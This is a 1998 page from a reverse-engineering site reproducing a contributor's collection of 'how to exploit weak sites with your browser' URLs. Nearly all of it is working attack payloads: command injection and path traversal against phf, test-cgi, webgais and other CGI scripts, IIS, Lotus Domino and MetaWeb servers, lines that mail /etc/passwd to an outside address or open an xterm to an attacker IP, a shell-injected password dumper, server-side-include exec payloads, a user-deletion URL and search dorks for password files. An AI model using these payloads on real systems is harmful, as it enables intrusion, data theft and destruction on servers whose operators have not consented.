courtesy of fravia+'s page of reverse engineering
12 November 1998
Well, this is an interesting addition... only for real reversers, though, beginners, please go study some elementary site busting first... for all the other ones... I don't think I need to explain you how interesting this stuff is... Enjoy! :-)
hi fravia+,
this is my collection of "how to exploit weak sites with your browser"
i'm working an a document which includes very new exploits .. i'll let you
know when it is ready ...
haveaniceday
RUDICARELL
# test cgi's
/cgi-bin/test-cgi?\whatever
/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
/cgi-bin/test-cgi?/*
/cgi-bin/test-cgi?* HTTP/1.0
/cgi-bin/test-cgi?x *
/cgi-bin/nph-test-cgi?* HTTP/1.0
/cgi-bin/nph-test-cgi?x *
# jj
/cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534~/bin/ls
# betterones
/cgi-bin/info2www?(../../../../../../../bin/mail rudicarell@hotmail.com
</etc/passwd)
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+rudicarell@hotmail.com+%3C+etc%2Fpasswd
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf?%0a blablabla
&Qalias=&Qname=&Qemail=&Qnickname=&Qoffice_phone= ... usw
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/fi?/etc/passwd
/cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd
/cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com]
/cgi-bin/textcounter.pl?/;IFS=\8;(ps ax;cd ..;cd ..;cd ..;cd etc;cat
hosts;set)\|echo;echo|
# other stuff
/dir/doit.phtml?/home/ftp/incoming/executemycode.phtml
/cgi-bin/AnyForm2? ...???
/cgi-bin/infogate? ...???
/cgi-bin/test.bat?&dir .... netscape server
/scripts/test.bat+%26dir+%26time+%26abracadabra.exe .... netscape
server
# microfuck
/guti.asp::$DATA asp ......
/global.asa asp ......
# long filenames :)
/somewhere/VERYLON~.HTM .... user save verylongyy.htm file
# quid pro quo server
/site.name/server%20logfile .... quid pro quo - server
# basic auth and others
/cgi-bin/www-sql/protected_directory/irgendwas.html
/cgi-bin/htmlscript?../../../../../../etc/passwd
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cool-logs/mlog.html?screen=/etc/passwd
/cool-logs/mylog.html?screen=/etc/passwd
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/webgais
Content-length: (laenge des exploits)
query=';mail+rudicarell\@hotmail.com</etc/passwd;echo'&output=subject&domain=paragraph
# sgi silicon graphics
/cgi-bin/handler/carelli;cat /etc/passwd|?data=Download (sgis! nur
tabs!)
/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' (sgis!)
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd (sgis! alte version)
/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5rudicarell\@hotmail.com\</etc/passwd;eval$CMD;echo
# frontpage extensions
www.domain.com/beliebiges_directory/_vti_cnf = directory
www.domain.com/_vti_pvt = world writeable
# old but still working IIS perl.exe
nt/scripts/perl.exe?%20-e%20"system%20('dir%20c:\\winnt35\\repair');"
# example bor bad perl oa
;xterm -display my.ip.address:0 &
john;echo "#include \"pwd.h\"">/tmp/shadow.c
john;echo "main(){struct passwd *p;while(p=getpwent())">>/tmp/shadow.c
john;echo
"printf(\"%s:%s:%d:%d:%s:%s:%s\\n\",p->pw-name,">>/tmp/shadow.c
john;echo "p->pw_passwd,p->pw_uid,p->pw_gid,p->pw_gecos,">>/tmp/shadow.c
john;echo "p->pw_dir,p->pw_shell);}">>/tmp/shadow.c
john;cc -o /tmp/shadow /tmp/shadow.c
john;/tmp/shadow>>/tmp/passwd
john;/bin/cat /tmp/passwd|/bin/mail remailer@some.remailer.com
john;rm /tmp/shadow*;rm /tmp/passwd
# sometimes its really bad
~root
~root/etc/passwd (zum beispiel)
altavista .... url:etc AND link:passwd ... oder ... root: 0:0
url:.htaccess .. oder .. url:.htpasswd
# NCSA files
httpd.conf configure the httpd service
srm.conf scripts and documents reside
access.conf service features for all browsers
.htaccess Limits access on a directory-by-directory basis
http .... bla bla /.htaccess (NCSA .........)
# microfuck
http ... bla bla .. /scripts/blabla.bat?&dir+c:\+?&time
test.bat+%26dir+%26time+%26pfieffer.exe
# novell
http ... bla bla .. /files.pl? ../../blabla
http ... bla bla .. /scripts/convert.bas?../../any_file_on_sys_volume
# MAC WEBSTAR
http ... bla bla .. /M_A_C_H_T_T_P_V_E_R_S_I_O_N
# lotus domino server (this is really cool)
http ... /domcfg.nsf/?open
htto ... /domcfg.nsf/URLRedirect/?OpenForm
http:... /database.nsf/viewname?SearchView&Query="*"
# nt carbo server ****
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
#example for server side includes anon-ftp upload****
<!--#exec cmd="/bin/ls"-->
<!--#exec cmd="mail me@my.org < cat /etc/passwd"-->
<!--#exec cmd="chmod 777 ~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="find / -name foobar -print"-->
<!--#include file="schweinenasenfile" -->
# metaweb servers
http://mail.server.com:5000/../smusers.txt
http://mail.server.com:5000/../../winnt/repair/sam._
http://mail.server.com:5000/../../winnt/system32/net.exe?
http://mail.server.com:5000/../../winnt/system32/net.exe?user%20joe%20/delete
port:2040 = javaconfig
port:5000 = mail
port:5001 = -"-
http://www.metainfo.com/products/sendmail/users.htm
http://www.metainfo.com/products/metaip/users.htm
# verity search software ******
s97_cgi.exe?Action=FormGen&ServerKey=Primary&Template=irgendwas (nt)
search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
# uaaa |-) zhhhh wwwboard.html /wwwboard/passwd.txt ****
wwwadmin.pl oder wwwadmin.cgi
# cgi von hylafax ***
/cgi-bin/faxsurvey?/bin/ls%20-a
# other microfuck
uploader.exe/
# new lotus-domino
http://www.server.com/database.nsf/viewname?SearchView&Query="*"
/*end*/
homepage links anonymity +ORC javascript wars academy database bots' wars tools cocktails antismut CGI-scripts search forms mail fravia+ Is reverse engineering legal?